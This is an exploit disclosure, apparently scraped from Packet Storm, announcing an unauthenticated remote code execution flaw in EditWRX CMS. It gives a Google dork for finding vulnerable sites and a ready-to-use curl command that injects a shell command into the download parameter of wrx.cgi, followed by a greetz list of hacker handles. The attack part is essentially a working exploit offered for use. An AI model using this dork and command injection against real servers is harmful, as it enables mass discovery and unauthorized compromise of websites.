EditWRX CMS suffers from a remote code execution vulnerability due to a mishandling of data passed to open().
699f214ce4bd4c490dad7a30ed840a34
__ __ ____ ______ ______ ______
.----.| |--.|__|.-----.-----.--.--.|_ | |__ |__ | |
| __|| || || _ | _ | | | _| |_|__ |__ |_ |
|____||__|__||__|| __| __|___ ||______|______|______| |____|
_________________|__|__|__|__|_____|_____________________________
VULN_____________________________________________________________
EditWRX CMS Remote Code Execution + Admin Bypass Zero Day
NFO______________________________________________________________
EditWRX is vulnerable to remote code execution through mishandling
of open() in the downloader, which can read in piped commands.
Despite the downloader being an administrative component, a login
is not required to call the function, and therefore no access is
required to exploit this vulnerability.
ZDAY_____________________________________________________________
Google: inurl:editwrx/wrx.cgi
RXE: curl http://example.com/editwrx/wrx.cgi?download=;uname%20-a|
Found by: chippy1337
GREETZ___________________________________________________________
Robert Cavanaugh
Ryan Cleary
Jasper Lingers
Carlos1337 (dos cero dia!)
MASTER HACKER
FLOOD HACKER
DR TIGER
WANG HACKER
DDOS KING
Sabu, Havij Professional
D0xbin
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!